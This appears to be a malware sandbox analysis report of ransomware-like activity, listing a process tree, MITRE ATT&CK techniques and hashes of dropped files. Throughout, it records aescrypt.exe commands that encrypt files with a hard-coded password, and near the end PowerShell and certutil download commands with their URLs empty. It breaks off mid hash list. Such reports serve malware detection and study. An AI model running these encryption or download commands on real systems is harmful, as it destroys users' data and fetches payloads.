C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MKLUFVRL-20201028-1835.log.lck" "MKLUFVRL-20201028-1835.log"
3⤵
PID:6328

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent.dat.lck" "sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6352

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH1ZRPV_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH1ZRPV_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6376

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "jusched.log.lck" "jusched.log"
3⤵
PID:6396

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_vcredistMSI5B67.txt.lck" "dd_vcredistMSI5B67.txt"
3⤵
PID:6420

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BleachGap.bin.exe.lck" "BleachGap.bin.exe"
3⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Microsoft.lck" "Microsoft"
3⤵
PID:6468

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp731C.tmp.lck" "tmp731C.tmp"
3⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp6C1E.tmp.lck" "tmp6C1E.tmp"
3⤵
PID:6508

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp6E6F.tmp.lck" "tmp6E6F.tmp"
3⤵
PID:4028

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp702E.tmp.lck" "tmp702E.tmp"
3⤵
PID:6620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:6656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6772

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:6724

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:6780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:6872

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:6876

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:6856

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:6864

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:6884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6908

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:6924

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:6968

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6992

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:7004

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:7032

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:7056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:7116

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:7160

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:6224

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:6300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6316

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:6400

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
3⤵
PID:6480

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6496

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:3032

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:6592

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:6616

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
3⤵
PID:6640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6676

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:6788

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:6712

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
3⤵
PID:6756

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck.lck"
3⤵
PID:6716

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:6900

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:6888

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
3⤵
PID:6908

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck"
3⤵
PID:6928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:6368

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\32c59a4ffccb45fca1e49fe24760ce2b /t 3044 /p 3040
1⤵
PID:908

C:\Windows\explorer.exe
explorer.exe
1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5088

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4968

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

File Deletion

T1107

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c2640e0fd23260cee5325ceaf370e42f

SHA1
55185789c3e4f9177e6f1c722a493604acae3219

SHA256
060c73610c6d4eb9d03ce2f6ed10fcee9c9508665c7a98a7d9bdde955751461d

SHA512
ecfe625e4ab85d04be8ca4561b40636c663809c59a11a8426c39d9d3f08f9dbf67bbce8f223df9e126bc3674eb2b18de420046aabbee557cfe8c27a3b4b9f576

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bd9020d72ed0ad78b9b868272fe57a55

SHA1
ccc28373d1f23905b69d3353326db8752d3b248a

SHA256
c1b6e8a54ffa78c35fb29ba56598c09166ad8033736a843961b93f017267e34a

SHA512
8567f8fa3127bb4559cb65f14594d82bd529d486274bc3a628ae761896a43281e92dbb5497273f30f97800d107296fe8d2b3f3edae6cf1d18090381f220be1df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4a42f98c342eb7def4c08a9ae1a08efb

SHA1
e6cc739c6512e35de91a3dc055ebd255336e99c9

SHA256
a6c0e481e94a3f1f925485f60a8e12dd85571ccbecd468d4702208e0d5d5ef79

SHA512
1efdcab26861955fcdca86ff676f7b14da3d1d4948363f6a76b21c826ed8acb8c8ea68f4cd08b35f15312b4574628d919c20b948dd7c86814f00085d6d0d047e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5cf02b0b480e987783e4e7c4b1abf7ac

SHA1
ca49b1d2b4627ec68457d6e2ebe82c954f978f07

SHA256
d577de7966173c36837e50d09c63008bd01fb82143cf1ac0fe2669fc8e4664bc

SHA512
b72a82cbc191b1fcb68e02fa036b20f36d6fdda50b7543b44840c1b6f3f1a243d83412115f942482f7b1ef2b999ec58f4e6b37d1a97156dc967fc3d9f536d55a

Download Submit
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\42BD.tmp\42BE.bat
MD5
f85a6cfab7a8a493cd38b58f2bbf7d58

SHA1
c157d72bb9b970eebc0a85cddb412f5236374f97

SHA256
a9fb7e35dad779ea39d890d17616da81d01915469e1b05ad4e696937f383fcdd

SHA512
eb4ba8e38961ea2001fe3bdc157ab02d9f359bf3e78369f64f2e776648d344f5e91d2847d6ecf60f7934197ecc9f3d032628684d925df4e90c51b31befb52cce

Download Submit
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
MD5
fb7a78f485ec2586c54d60d293dd5352

SHA1
d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb

SHA256
b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9

SHA512
b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
MD5
fb7a78f485ec2586c54d60d293dd5352

SHA1
d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb

SHA256
b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9

SHA512
b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
MD5
fb7a78f485ec2586c54d60d293dd5352

SHA1
d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb

SHA256
b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9

SHA512
b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
